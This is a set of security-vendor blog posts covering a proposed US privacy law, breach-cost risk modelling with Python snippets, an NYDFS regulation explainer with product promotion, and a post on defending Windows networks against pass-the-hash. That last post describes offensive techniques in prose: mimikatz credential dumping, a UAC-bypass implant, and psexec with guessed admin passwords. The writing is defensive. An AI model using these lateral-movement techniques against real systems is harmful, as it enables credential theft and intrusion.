All posts by Andy Green

GDPR, American-Style: Preview of Proposed Federal US Privacy Law, Part I

The General Data Protection Regulation (GDPR) has, for good reason, received enormous coverage in the business and tech press in 2018. But wait, there’s another seismic privacy shift occurring, and it’s happening here in the US. There is now a very good chance that significant data privacy legislation will come to the US soon. I’ll go out on a limb and say in 2019. But if not next year, then certainly in 2020.

Yes, we’ll likely see GDPR-lite privacy requirements becoming yet another compliance consideration for US companies in the very near future.

No, hell has not frozen over. In fact, various US data security and privacy bills have been kicking around Congress for years. With GDPR becoming a reality, and some well-publicized privacy lapses making headlines, Silicon Valley companies decided to back federal privacy legislation rather than deal with a patchwork of separate state initiatives.

In September, AT&T, Google, Amazon, Twitter and Apple, testified in Senate hearings in favor of a federal privacy law, with  each offering their own frameworks. They were essentially calling for a simplified version of GDPR. In short, they agreed to stricter consumer controls over their personal data, including a right to deletion/correction, and explicit opt-in for collection and sharing of consumer data.

Let’s Hit the Law Books

Congress has also gotten busy and started introducing its own newly cooked-up batch of privacy legislation, with Senators Blumenthal and Wyden taking the lead. Other Senators are weighing in as well.

So what’s in these proposed laws? Well, Blumenthal’s has not yet been published, but Wyden has a fully formed privacy bill available on the Senate website.

These are big pieces of legislation — though not nearly as complex as GDPR — so I don’t blame you for not immediately diving in and trying to decipher them. However, I’ve generously volunteered to do the heavy lifting, and have spent a few afternoons looking for the good parts, so to speak. While we won’t know what the final US privacy law will look like for at least a few months, I’m betting that some of the key elements of the Wyden bill will make the cut.

In this two-part series, I’ll explain what I think a future US law will look like and come up with some short-term next steps that can be addressed by your CSO and CIO, sooner rather than later.

If I had to summarize, I’d say we can expect a far broader definition of personally identifiable information (PII) than what’s in most state laws, stronger consumer rights and protections over this data (opt-in, correct, delete), obligations to analyze data and assess risks, a minimum baseline for data security, and, last but not least, significant fines and other penalties for not following the law.

What won’t be in the coming US privacy law? If I’m reading the tea leaves correctly, there won’t be a breach notification rule like the GDPR’s. Not yet anyway.

That’s the big-picture view. So let’s get into some of the details, and, in the spirit of end-of-year prognostications, I’ll add my predictions for what I think will ultimately become part of the privacy law of the land in the US.

1. Personal Information

We’re going to get a more modern version of PII. Period. Wyden’s Consumer Data Protection Act (CDPA) defines personal information as data “that is reasonably linkable to a specific consumer or consumer device.” This is about as encompassing a definition as you can get, and it would include quasi-identifiers — for example, birthdate, zip code, and gender — that I wrote about once upon a time.

On the other hand, the personal information definition in, say, Senator Thune’s proposed data security law is not nearly as abstract, and instead lists all the usual identifiers — name, address, account, license. It does, though, call out internet-era identifiers and information – user names, passwords, and biometric data.

Keep in mind that even traditional identifiers, such as license numbers, can vary by state, and I won’t even get into financial account numbers. To comply with a federal privacy law, you’ll need sophisticated pattern matching just to deal with the legacy identifiers spread out across your file system.
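To give you a feel for what that pattern matching involves, here’s a minimal Python sketch. The patterns and the file-share path are hypothetical stand-ins; a real classification engine needs far more nuance (state-by-state license formats, checksum validation, context rules):

import re
from pathlib import Path

# Toy patterns only, all names and paths here are hypothetical.
PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "phone": re.compile(r"\b\d{3}[-.]\d{3}[-.]\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
}

def scan_tree(root):
    """Walk a directory tree and flag files that contain likely identifiers."""
    for path in Path(root).rglob("*.txt"):
        text = path.read_text(errors="ignore")
        hits = {name: len(rx.findall(text)) for name, rx in PATTERNS.items()}
        hits = {k: v for k, v in hits.items() if v}
        if hits:
            print(f"{path}: {hits}")

scan_tree("/shares/finance")   # hypothetical file share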

What’s a possible solution to the identifier chaos in terms of legal language? The US does have a hybrid model for PII with the HIPAA law and its definition of protected health information (PHI). All your health information is technically under HIPAA, but to make it easier for insurers and other covered entities, the government created a loooong list of explicit safe harbor identifiers. In short, if you protect these 18 identifiers, you’re in compliance.

Prediction: I’ll boldly predict that we won’t see a GDPR-style definition of personal information, like the one in the Wyden bill. Instead we’ll see a list approach, but one that will include a lot of basic online identifiers – user names, passwords, handles, PINs, etc. — as well as, of course, the legacy ones. In any case, most companies will have to up their game to track and classify data based on this longer list.

2. Risk Assessments and Compliance Reports

Definition of risk assessment from Wyden’s CDPA.

The Wyden legislation makes risk assessments a centerpiece of its privacy requirements. The law goes into some detail about assessments needing to be made based on a few factors, including data minimization, storage duration, and accessibility. It restricts these assessments, though, to automated decision making – that is, algorithms. But the Thune legislation, as just one other example, has more general risk assessment requirements.

Additionally, the proposed Wyden law asks larger companies (above $1 billion in revenue) to produce an annual data protection report showing that they have “reasonable cyber security and privacy policies” in place. Of course, risk assessments are a standard part of reasonable data security and privacy programs.

The Wyden law, by the way, also requires the CEO, the chief privacy officer (CPO), and the chief information officer (CIO) to certify the report!

Prediction: We will see explicit language about risk assessments and data security policies (minimization, access, etc.). We are past the self-policing phase of data privacy and security, and this new law will force US companies to prove that their IT departments are doing what they claim. For a sneak preview of what might be in store, check out the NYDFS Cyber Regulation, which gets into nitty-gritty details in terms of security program requirements, including an annual report summarizing these efforts.

We’ll continue in the next post with more of what to expect in next year’s US privacy law. And I’ll provide some ideas for how to get ahead of the curve!


CEO vs. CSO Mindsets, Part III: Value at Risk For CSOs

To convince CEOs and CFOs to invest in data security software, CSOs have to speak their language. As I started describing in the previous post, corporate decision makers spend part of their time envisioning various business scenarios, and assigning a likelihood to each situation. Yeah, the C-level gang is good at poker, and they know all the odds for the business hand they were dealt.

For CSOs to get through to the rest of the C-suite, they’ll need to understand the language of risk and chance. It is expecting too much for upper-level non-IT executives to appreciate, say, operational reports on the results of vulnerability scans or how many bots were blocked per month. That’s definitely helpful for IT, but the C-suite is focused on far more fundamental measures.

They want to know the answer to the following question: what are the chances of a catastrophic breach or cyber event, perhaps costing over $10 million, occurring in the next 10 years? Once CEOs have this number, they can price various options to offset the risk and keep their business on track.

I suspect most IT departments, except in the largest companies where formal catastrophe planning is part of their DNA, would be hard pressed to come up with even a rough estimate for this number.

In this post, I’ll guide you through a back-of-the-envelope calculation to answer this question. The approach is based on the FAIR Institute’s risk analysis model. Their core idea is that you can assign numbers to cyber risk using available data sources — both internal and external. In other words, you don’t have to fly completely blind in the current cyber threat environment.

FAIR (and other approaches as well) effectively breaks down the cost of a data breach into two components: the severity or magnitude of a single incident, and the frequency at which these cyber events occur over a given period of time. Simple, right?

The FAIR approach in one picture: loss frequency × loss magnitude = average loss.

If you’re thinking that you can multiply the separate averages of each — frequency and severity — to obtain an average for yearly cyber losses, you’re right (with some qualifications). The advantage of the FAIR model is that it allows you to go as deep as you want, depending on your resources, and you can get more granular information beyond broad averages.

I should add that FAIR is not re-inventing the risk wheel. Instead, they’ve systemized techniques used principally by banks and insurance companies, which have long had to handle catastrophes, financial crises, and natural disasters, and know how much to set aside for the proverbial rainy day.

Mastering Data Disasters: How Bad Is the Risk?

In the last post, I took two years of HIPAA breach reporting data to derive what I called an exceedance loss curve. That’s a fancy way of saying I know the percentiles (or quantiles in risk-speak) for various cyber costs. For this post, I rearranged the curve to make it a bit more intuitive, and you can stare at the graph below:

We finally have a little more insight into answering the question a CEO of a health insurer might ask: how bad can it get?

Answer: Pretty bad!

The top 10% of healthcare cyber incidents can be very costly, starting at $8 million per attack. Yikes.

It’s also interesting to analyze the “weight” or average cost of the last 10% of this severity curve. As we’ll soon see, this is a power-law-ish, Pareto-style distribution that I talked about back here.

I did a quick calculation using the HIPAA data: the top 10% (or 90th percentile) of incidents, representing under 30 data points, carries a disproportionate 65% of the total cost of all losses! With heavy-tailed curves, we need to focus on the extremes or tail because that’s where all the oomph is.
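If you want to try this tail math on your own loss numbers, it’s only a few lines of Python. A sketch, using synthetic heavy-tailed data as a stand-in for the roughly 300 HIPAA-derived costs:

import numpy as np

rng = np.random.default_rng(1)
losses = rng.pareto(1.3, 300) * 1e5   # synthetic stand-in for ~300 incident costs

p90 = np.percentile(losses, 90)       # severity at the 90th percentile
tail = losses[losses >= p90]          # the worst 10% of incidents
share = tail.sum() / losses.sum()     # fraction of total cost the tail carries

print(f"90th percentile loss: ${p90:,.0f}")
print(f"top-10% share of total cost: {share:.0%}")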

If we were to do a more sophisticated analysis along the lines of FAIR, we would then take the above healthcare loss severity distribution and merge it with both internal loss data (if available) and a risk profile based on, perhaps, a survey of company infosec experts.

Naturally, it would be very helpful to conduct a data risk assessment to discover how much sensitive data is spread out across your file systems, along with the associated permissions. This would be fed into the risk formulas.

There are some math-y methods to combine all this together using various weights, and you can learn more about this in Doug Hubbard’s RSA presentation, or (shameless plug) in his book: How to Measure Anything In Cybersecurity Risk.

Healthcare Incident Rates and the Ultimate Average

For our purposes, let’s take the HIPAA reporting data as a good representation of how bad breach costs can be for our imaginary healthcare insurance company.

Now let’s deal with the next component. For the frequency or rate at which incidents occur, you may want to rely more heavily on your own internal data. There are also external data sets. For example, the Identity Theft Resource Center tracks breach incidents by industry sector, and their health care numbers can guide you in your guesstimating.

Let’s say, for argument’s sake, that our insurer has logged one significant cyber incident every four years, for an average rate of “.25 incidents” per year.

Drumroll … I multiply the average incident rate, .25, by the average loss or severity cost of $4.2 million (from the above curve) to come up with an average annual loss of about $1 million.
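You can sanity-check that multiplication with a quick simulation. In this sketch, I assume Poisson-distributed incident counts and an exponential severity with the same $4.2 million mean; both distributional choices are illustrative assumptions, not part of FAIR:

import numpy as np

rng = np.random.default_rng(0)
freq, mean_cost = 0.25, 4.2e6    # incidents per year, average loss per incident

years = 50_000
n_events = rng.poisson(freq, size=years)   # incident count for each simulated year
annual = np.array([rng.exponential(mean_cost, n).sum() for n in n_events])

print(f"simulated AAL  : ${annual.mean():,.0f}")
print(f"freq x severity: ${freq * mean_cost:,.0f}")   # ~$1.05M either way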

This number may be eyebrow-raising to CSOs and CEOs of our hypothetical healthcare company. We are dealing with heavy-tailed data, and while this company may not have experienced a $4 million incident (yet), the average tells you how bad it can get. And this can help guide C-levels in deciding how much to spend on security risk mitigation — software, training, etc.

With two parameters, alpha and beta, you can go into the breach cost prediction business.

To go a little deeper, I used stats software — thank you, EasyFit! — for some curve wrangling. I picked a power-law distribution, known as Pareto-2, to fit the data.

Though there are comfier fits with other heavy-tailed distributions in their software, it turns out that this one is a very good approximation for the tail, which is really what we’re interested in. And as we’ll soon see, this function will help us say more precisely how bad it can get.
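EasyFit did the fitting for me, but if you prefer open-source tools, scipy ships the Pareto-2 under the name lomax. A rough sketch, with a hypothetical input file standing in for the incident costs:

import numpy as np
from scipy import stats

losses = np.loadtxt("hipaa_losses.csv")   # hypothetical one-column cost file

# Pin the location at zero so the two remaining parameters play the
# roles of alpha (shape) and beta (scale).
alpha, loc, beta = stats.lomax.fit(losses, floc=0)
print(f"alpha = {alpha:.2f}, beta = {beta:,.0f}")

# Eyeball the tail fit by comparing empirical and fitted 90th percentiles.
print("empirical 90th pct:", np.percentile(losses, 90))
print("fitted    90th pct:", stats.lomax.ppf(0.90, alpha, scale=beta))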

Towards Value at Risk (VaR)

I just took you on a speedy tour through the first level of the FAIR approach. The average number we came up with, known in the trade as AAL (average annual loss), is a good baseline for understanding cyber risks.

As I suggested above, the CEO and (especially) the CFO want more precise information. This leads to Value at Risk or VaR, a biz-school formula that financiers and bankers use in their risk estimates.

If you’ve ever taken, as I have, “statistics for poets”, you’ll immediately recognize VaR as the 90% or 95% confidence formula for normal curves. Typically, CFOs prefer measuring the 99% level — 2.3 standard deviations from the mean — or the “once in a hundred years” event.

Why?

They are planning for extreme situations! You can think of CFOs grappling with how much to set aside to deal with the equivalent of a cyber tornado or hurricane, and for this, VaR is well suited.

Using my stats software, I came up with a 90% VaR — a once-in-10-years event — for my non-normal heavy-tailed distribution: it calculates a VaR of $8.2 million, which is close to the actual HIPAA data at the 10% mark in the graph above. Good work, EasyFit!

The advantage of having a VaR formula, which I’ll go into more detail next time, is that it enables us to extrapolate: we can answer other questions beyond what the data tells us.

For example: what can I expect in breach costs over a 10-year period, assuming an average of, say, three cyber events in that period? I won’t hold you in suspense … the 90% VaR formula tells us it’s about $19 million, under 3 times the average cost of a single cyber event.
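Here’s a rough Monte Carlo version of that extrapolation: event counts as Poisson draws, severities sampled from a fitted Pareto-2. The alpha and beta below are placeholders, not my actual fitted values:

import numpy as np
from scipy import stats

rng = np.random.default_rng(7)
alpha, beta = 2.0, 4.2e6        # placeholder Pareto-2 parameters
events_per_decade = 3

decades = 20_000
losses = []
for n in rng.poisson(events_per_decade, size=decades):
    # Total loss for one simulated decade: the sum of n severity draws.
    losses.append(stats.lomax.rvs(alpha, scale=beta, size=n, random_state=rng).sum())

print(f"90% VaR over 10 years: ${np.percentile(losses, 90):,.0f}")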

Let’s call it a day.

I’ll go over some of this material again, and tie it all up into a nice package in my next post. And we’ll learn more scary details about evil heavy-tailed breach loss curves.

NYDFS Cybersecurity Regulation in Plain English


In 2017, the New York State Department of Financial Services (NYDFS) launched GDPR-like cybersecurity regulations for its massive financial industry. Unusual at the state level, this new regulation includes strict requirements for breach reporting and limiting data retention.

Like the GDPR, the New York regulation has rules for basic principles of data security, risk assessments, documentation of security policies, and designating a chief information security officer (CISO) to be responsible for the program.

Unlike the GDPR, the regulation has very specific data security controls, including annual pen testing and vulnerability scans!

The point of these rules, as with the GDPR, is to protect sensitive nonpublic information — essentially consumer personally identifiable information (PII) that can be used to identify an individual.

NYDFS Cybersecurity Regulation Defined

The NYDFS Cybersecurity Regulation (23 NYCRR 500) is “designed to promote the protection of customer information as well as the information technology systems of regulated entities”. This regulation requires each company to conduct a risk assessment and then implement a program with security controls for detecting and responding to cyber events.

Who Does the NYDFS Cybersecurity Law Apply To?


The NYDFS has supervisory power over banks, insurance companies, and other financial service companies. More specifically, they supervise the following covered entities:

  • Credit Unions
  • Health Insurers
  • Investment Companies
  • Licensed Lenders
  • Life Insurance Companies
  • Mortgage Brokers
  • Savings and Loans Associations
  • Private Bankers
  • Offices of Foreign Banks
  • Commercial Banks

In short: any institution that needs a license from the NYDFS is covered by this regulation. A more extensive list can be found here.

There are some exemptions for companies that fall under the following categories:

  • Fewer than 10 employees, including any independent contractors, of the Covered Entity or its Affiliates located in New York or responsible for business of the Covered Entity, or
  • Less than $5,000,000 in gross annual revenue in each of the last three fiscal years from New York business operations of the Covered Entity and its Affiliates, or
  • Less than $10,000,000 in year-end total assets, calculated in accordance with generally accepted accounting principles, including assets of all Affiliates, or
  • There’s no storing or processing of nonpublic information.

How Does The NYDFS Cybersecurity Regulation Work?

The NYDFS Cybersecurity Regulation works by enforcing what are really common-sense IT security practices. Financial companies in New York that already rely on existing standards, say PCI DSS or SANS CSC 20, should have little problem meeting the New York regulation.

In short, NYDFS is asking organizations to assess their security risks, and then develop policies for data governance, classification, access controls, system monitoring, and incident response and recovery. The regulation calls for companies to implement, at a minimum, specific controls in these areas (see the next section) that are typically part of compliance standards.

The big difference, of course, is that New York State regulators at the Department of Financial Services are enforcing these rules, and that not complying with the regulation becomes a legal matter. They even require covered entities to designate a CISO who will annually sign off on the organization’s compliance.

What Are The NYDFS Regulation Requirements?


Covered entities will have to implement the following:

  • Risk Assessments – Conducted periodically and used to assess the “confidentiality, integrity, security and availability” of the IT infrastructure and PII. (Section 500.09)
  • Audit Trail – Designed to record and respond to cybersecurity events. The records will have to be maintained for five years. (Section 500.06)
  • Limitations on Data Retention – Develop policies and procedures for the “secure disposal” of PII that is “no longer necessary for business operations or for other legitimate business purposes” (Section 500.13)
  • Access Privileges – Limit access privileges to PII and periodically review those privileges. (Section 500.07)
  • Incident Response Plan – Develop a written plan to document internal processes for responding to cybersecurity events, including communication plans, roles and responsibilities, and necessary remediations of controls as needed. (Section 500.16)
  • Notices to Superintendent – Notification to the NYDFS within at most 72 hours after a “material” cybersecurity event has been detected. (Section 500.17)

NYDFS Cybersecurity FAQs

    1. Do you have to report all cybersecurity events to NYDFS within 72 hours?
      No. You only have to report events that have a “reasonable likelihood of materially harming any material part” of the company’s IT infrastructure. For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.
    2. How frequently do you have to conduct risk assessments?
      Covered entities are supposed to conduct “periodic” assessments. However, keep in mind the CISOs will have to certify annually (see below) that their organization is in compliance. You should expect to do assessments at a minimum once per year.
    3. How much documentation is required beyond developing security policies?
      There’s no escaping the fact that reporting requirements are significant, and CISOs will be busy just handling this new regulation. In addition to reporting material cyber incidents to NYDFS, the CISOs will have to report annually to the board or governing body the current cybersecurity state of the organization, including material cybersecurity risks, effectiveness of controls, and material cybersecurity events. For any weaknesses that are discovered as part of the assessment, CISOs will need to document the remediation efforts that were undertaken. Finally, the CISO will also have to annually certify to the NYDFS that their organization is in compliance.

NYDFS Cybersecurity Regulation Tips for Compliance

There are a few important points to keep in mind about the NYDFS regulations:

  • NYDFS rules on breach reporting cover a far broader type of cyber event than any other state’s. Not only does the organization have to report stolen information, but also any attempt to gain access to, disrupt, or misuse a system. This includes denial-of-service (DoS), ransomware, and any kind of post-exploitation where system tools are leveraged and misused. Look for monitoring systems that have the capability to detect unusual access to sensitive data.
  • There are significant training requirements for cyber staff. Companies will have to provide corporate training to “address relevant cybersecurity risks”. And cyber staff are not off the hook either: they are required to take steps to stay professionally current with cybersecurity trends. Financial companies in New York will likely need to up their training budgets to meet these rules.
  • Data classification is a critical first step in performing a risk assessment. A security team will need to determine how much PII is in the organization, where it is located, and who has access to it in order to evaluate potential risk. This information is then used to tune access rights to this sensitive data so that only those who really need data as part of their role have access — and no one else.

How Varonis Can Help

Here’s how Varonis maps to the NYDFS requirements:

Section 500.02 Cybersecurity Program. Varonis detects insider threats and cyberattacks by analyzing data, account activity, and user behavior; prevents and limits disaster by locking down sensitive and stale data; and efficiently sustains a secure state with automation.

Section 500.06 Audit Trail. Varonis gives you a single unified platform to manage risk and protect your most important assets, along with built-in reports and a detailed, searchable audit trail of data access. With a unified audit trail, admins or security analysts are only a few clicks away from knowing who’s been opening, creating, deleting, or modifying important files, sites, Azure Active Directory objects, emails, and more.

Section 500.07 Access Privileges. DatAdvantage maps who can access data and who does access data across file and email systems, shows where users have too much access, and then safely automates changes to access control lists and security groups. DataPrivilege gives business users the power to review and manage permissions, groups, and access certification, while automatically enforcing business rules. The Automation Engine discovers undetected security gaps and automatically repairs them, fixing hidden security vulnerabilities like inconsistent ACLs and global access to sensitive data.

Section 500.09 Risk Assessment. Varonis Risk Assessments provide a comprehensive report that highlights at-risk sensitive data, flags access control issues, and quantifies risk. The risk assessment summarizes key findings, exposes data vulnerabilities, provides a detailed explanation of each finding, and includes prioritized remediation recommendations.

Section 500.13 Limitations on Data Retention. Data Transport Engine automatically moves, archives, quarantines, or deletes data based on content type, age, access activity, and more. Migrate data cross-domain or cross-platform, all while keeping permissions intact and even making them better. Quarantine sensitive and regulated content, discover data to collect for legal hold, identify data to archive and delete, and optimize your existing platforms.

Section 500.14 Training and Monitoring. Varonis continually monitors and alerts on your core data and systems. Detect unusual file and email activity and suspicious user behavior, and trigger alerts cross-platform to protect your data before it’s too late. Automatic response triggers can stop ransomware in its tracks and mitigate the impact of compromised accounts and potential data breaches. Visualize security threats with an intuitive dashboard, investigate security incidents, and even track alerts and assign them to team members for closure.

Section 500.16 Incident Response Plan and Section 500.17 Notices to Superintendent. (Covered in the requirements list above.)

NYDFS dictates that risk assessments are not just a good idea, but (at least in New York State) are required for financial companies. Get started with a free risk assessment: we’ll identify PII, flag excessive permissions, and help you prioritize at-risk areas – and take the first steps towards meeting NYDFS compliance.

Koadic: Security Defense in the Age of LoL Malware, Part IV

One of the advantages of examining the gears inside Koadic is that you gain low-level knowledge into how real-world attacks are accomplished. Pen testing tools allow you to explore how hackers move around or pivot once inside a victim’s system, and help you gain insights into effective defensive measures.

Block that Hash Passing

Pass the Hash (PtH) is one approach, though not the only one, for moving beyond the initial entry point in the targeted system. It’s received lots of attention, so it’s worth looking at more closely.

The key assumption behind PtH is that you already have local administrative privileges, which is required by mimikatz and other hash passers. Koadic conveniently provides mimikatz in one of its implants.

Is getting admin privileges for PtH an issue for hackers?

Generally not! The hackeratti have found that obtaining local admin privileges is not a major barrier. They’ve been able to take advantage of special exploits, guess default Administrator passwords, or get lucky and land on an account that already has higher privileges.

Koadic, for example, includes a few implants that can raise privilege levels. The one I tried is based on Matt Nelson’s work involving the auto-elevation capabilities of the Windows binary eventvwr.exe, which is, somewhat ironically, the Windows Event Viewer. Anyway, Microsoft has since come out with a patch for this exploit in Windows 10.

At one point during my initial testing over the summer, Koadic’s bypassuac_eventvw implant seemed to work on my Amazon instance. In my last test, it failed, and I’ll assume I got lucky working with an unpatched system the first go-round.

There’s a lesson here: in the wild, not every system is going to be patched, and hackers will hunt around until they find one!

UAC Helps!

Microsoft has written a long and comprehensive white paper on preventing PtH. It’s worth your time to scan through it. However, much has also been written by security wonks on what Microsoft has done (or not done) to prevent PtH. And after reading the more in-depth analyses, I’m not sure I understand all the subtleties!

In any case, one of Microsoft’s recommendations is User Account Control, UAC for short, a security control added at the time of Vista. It prevents privileged accounts from automatically doing whatever they want until their actions are approved (on a secure console) by a human. You may have seen the UAC dialog show up on your office laptop when you try to download and execute a binary from the Intertoobz.

You can find the UAC settings in Group Policy Objects under Policies\Windows Settings\Security Settings\Local Policies\Security Options (below). The MS honchos recommend, at a minimum, enabling Admin Approval Mode. In my testing, I got carried away and liberally enabled a few other UAC options.

With UAC enabled, I was able to stop Koadic from running its mimikatz implant.

I set up a scenario where the Koadic stager is launched directly from a local Administrator account. Even in this obvious case, you eventually have to deal with UAC. You can still run commands remotely from the Koadic console, but if you try to engage in a PtH pivot, you’re blocked (below). I checked the event log, and sure enough there’s an entry showing that UAC was activated.

Blocked by UAC!

In short: UAC prevents hackers from getting to domain-level credentials and easily hopping from one computer to another.

The Horror of Local Administrator Accounts

One of the root enablers of lateral movement is the local Administrator accounts that once upon a time Windows set up automatically. To make life easier, IT admins have often configured these accounts with the same easily guessable passwords across many machines.

For hackers, that’s like throwing gasoline on the fire: once in, they can effortlessly navigate around the victim’s system without even a PtH. They just run psexec, supplying it explicitly with the Administrator’s password, say admin123.  Easy peasy.

There’s another bad practice of giving some users — often executives — local Administrator privileges on the mistaken belief that they need these extra privileges to do special tasks. In other words, their user accounts are added to the local Administrator group on their laptops.

Lucky hackers that land on one of these machines can then hit the ground running: they already have elevated permissions so they can PtH from the get go.

What are some ideas for lessening the risks with local accounts?

The aforementioned PtH white paper suggests removing ordinary domain users from the local Administrator group. A good idea, and I approve of this message.

If you do keep local Administrator accounts, then make sure they have high-entropy passwords. It can be a major headache to go back and update bad admin passwords at larger sites. Microsoft generously provides the Local Administrator Password Solution (LAPS) and Restricted Groups to allow companies to centrally manage these accounts. It’s a topic I took up in this post.

You could then follow this up by preventing local accounts from logging in remotely. There’s a GPO setting under Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment called “Deny access to this computer from the network”. By configuring it with a local SID, as explained here, you should be able to block any local account from networking.

[Updated]

So even if hackers have gained a privileged local account, we can stop them from moving around with this GPO setting. I’ve not tried this particularly efficient way of stomping out PtH, but I’ll update this post as soon as I give it a test ride.

I did get a chance to try this recent patch, which makes it incredibly convenient to disable local Administrator accounts from networking at the domain level by providing the new SID “NT AUTHORITY\Local account and member of Administrators group”. You just need to enter this loooong string into the deny-networking GPO setting:

Stop local admin networking now! There’s a separate GPO, by the way, for disabling remote desktopping.

This is not necessarily a bad idea. Yes, you’ve prevented hackers from networking with, say, psexec, if they happen to guess the local Administrator password correctly. But you’ve probably also inconvenienced some admins, and made them more than a little angry, along the way.

If you don’t want to inconvenience your own team, and assuming they have good, hard-to-guess passwords, there’s another possibility. But therein lies a tale, which is covered in this extensive post by the awesome Will “harmj0y” Schroeder. To turn off the token passing that allows the PtH attack to succeed, you have to deal with two regedit settings found under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (below).

With these two regedit settings, you can turn off PtHing. They will stop hackers from dumping admin credentials and re-using them on another machine.

After some trial and error, I think I finally got what harmj0y was saying. In short, you can allow admins to network with their high-entropy, hard-to-guess passwords while stopping hackers from PtHing. I’ll talk more about this in another post.
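For reference, here’s what flipping those two values might look like in Python’s winreg. The value names (LocalAccountTokenFilterPolicy and FilterAdministratorToken) and their settings reflect my reading of harmj0y’s write-up, so treat them as assumptions and verify before touching a production registry:

import winreg

KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY, 0, winreg.KEY_SET_VALUE) as key:
    # 0 = remote logons with local-account credentials get a filtered,
    # non-admin token, which is what breaks local-account PtH.
    winreg.SetValueEx(key, "LocalAccountTokenFilterPolicy", 0, winreg.REG_DWORD, 0)
    # 1 = even the built-in RID-500 Administrator gets a filtered token remotely.
    winreg.SetValueEx(key, "FilterAdministratorToken", 0, winreg.REG_DWORD, 1)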

Closing Thoughts on LoL Defense

Keeping hackers contained on a single machine is a practical way to reduce risks. Sure, they’re inside and can still do some reconnaissance, but at least you’ve contained them.

Koadic shows how hackers can use existing Windows binaries — mshta, rundll32 — to download scripts. But you can turn off this remote script-loading capability, and shut down the attack from the start, with Windows Firewall! There’s no reason these binaries should be accessing the Internet, and the Firewall lets you disable their outbound connections.

Finally, Windows 10 will, no doubt, lead us all into a more secure future. Its Windows Defender has powerful malware detection capabilities, and Credential Guard seems to have a more comprehensive solution for dealing with hashes and Kerberos tickets. I’ll take this up in a future post.


CEO vs. CSO Mindsets, Part II: Breach Risk, Security Investment, and Thinking Like an MBA

In the last post, I brought up the cultural differences between CEOs and CSOs. One group is managing and growing the business, using spreadsheets to game plan various money making scenarios. The other is keeping the IT infrastructure going 24/7, and studying network diagrams while tweaking PowerShell scripts. I think you know which is which.

The point of this series is to bridge the divide between these two different tribes. In this post, I’ll be dispensing advice on how CSOs and CIOs can begin to convince their overlords — CFOs and CEOs — to pay for data security software. And the first step is to get a better understanding of how CEOs do their work.

Instant MBA for CSOs

The cultural problem begins at business school. No doubt there are more than a few CSOs and CIOs with MBAs, but most of them are too busy learning about the latest pen testing techniques or studying for their next IT certification.

However, I can save CSOs two years of study and hundreds of thousands of dollars in tuition. I’ve taken a brief tour of a typical MBA syllabus and can boldly say that everything you need to know about higher business thinking can be distilled into a simple example.

Let’s say, as they do in a typical B-school assignment, you have $500,000 to invest. If you put it all in a savings account, you can earn a risk-free 1% per year, or $5,000. Or you can take stakes in some tech startups for $10,000 a pop. In this example, each startup investment has a 1 in 20, or 5%, chance of cashing in at a later round of financing to the tune of $400,000.

Which option is better?

MBA students learn about such higher concepts as the law of large numbers, and they effortlessly calculate the average return on the above investment. They know in the long run they’ll come out ahead with the startup investments, and in the short run they’ll have to deal with the cruel winds of Fortune (and gambler’s ruin).

So with 50 investments in startups, you have a 72% chance of yielding two or more startup victories and cashing out for at least $800,000. On the other hand, you can lose the entire $500,000 investment 28% of the time. But the payouts will ultimately cover the losses and give a profit to boot — an expected payout of $1 million for a profit of $500,000.
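You can check that arithmetic yourself with the binomial distribution; here’s a short Python sketch using scipy:

from scipy.stats import binom

n, p = 50, 0.05                  # 50 startup bets, 5% win rate each
payout, stake = 400_000, 500_000

print(f"P(2+ wins)  = {1 - binom.cdf(1, n, p):.0%}")   # ~72%
print(f"P(0-1 wins) = {binom.cdf(1, n, p):.0%}")       # ~28%, the losing scenarios
print(f"expected payout = ${n * p * payout:,.0f}")     # $1,000,000 on a $500,000 stake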

What does this have to do with convincing executives to invest in data protection software?

Let’s say the CEO has a spreadsheet — trust me, she does! — showing revenues and costs projected over the next few years. Of course, she’s assigned various weights or probabilities to different scenarios and calculated an average payout for each.

Here’s the bad news for CIOs and CSOs. While the standard IT reports, charts, and statistics are essential to understanding the company’s current security status, they are not useful in themselves to CEOs. You’d get a “so what?” if you showed them a graph of the number of bots probing ports on an hourly basis.

In justifying an investment in new data security software, a CEO wants to know how data security software will bend or shape the projections in the spreadsheets.

To convince the other C-levels and/or the board of directors, the CSO will have to prove that a breach, with some non-trivial probability, can occur that will cause a significant loss involving legal costs, regulatory fines, class action suits, and customer churn. And then explain how the proposed security software will ultimately pay for itself by protecting against these breaches, thereby keeping the business plans on track.

Data Breaches and Risk

This is not a unique problem in business decision making. Some of the ideas and support tools I’ll be discussing below may be new to CIOs, but they can be learned and applied easily by anyone who’s done even the simplest model building.

First, let me give a shout out to the Cyentia Institute and a gold star to the FAIR Institute. You can noodle on these things on your own, as I did, but it helps that FAIR has a systematic methodology to arrive at an analysis that any CEO would be happy to hear out.

For the naysayers who think this is all guesswork and mathiness, there are more real-world datasets available than you might at first think, and the methodologies I’ll be discussing are more accurate than being guided by intuition alone.

FAIR’s approach forces you to delve into two areas: the magnitude or cost of a data breach incident, and the frequency at which these attacks arise. From that you can come up with a reasonable estimate of the average cost of dealing with breaches over a given time period.

Let’s take up the first part, the cost of a breach. Actually, this is not a single number! It’s really a distribution of percentages — say, 10% of breach incidents cost less than $10,000, 15% cost $30,000 or less, etc. This distribution of losses goes under the fancy name of exceedance or excess loss probabilities. In the real world, insurance companies produce these distribution charts to work out auto or home policies for their risk pools.

Can you work out an exceedance probability for your own situation?

You may have to do some digging and perhaps basic model building. However, for healthcare breaches in particular, we have an embarrassment of riches thanks to HIPAA!

I was able to take the last two years of HIPAA breach report data and calculate losses based on Jay Jacobs’ breach cost regression formula. The loss distribution comes from ranking the costs from smallest to largest and calculating the percentages. My approach is not quite a true excess loss curve, but we’ll take that up next time.

Loss distribution based on about 300 data points from 2016 – 2018. (Source: HIPAA)

It’s worthwhile to ponder the above, and note how the incidents cluster at the base while the tail has fewer but more enormous incidents: in the tens of millions, with one weighing in at over $100 million. I’m smelling a fat tail!

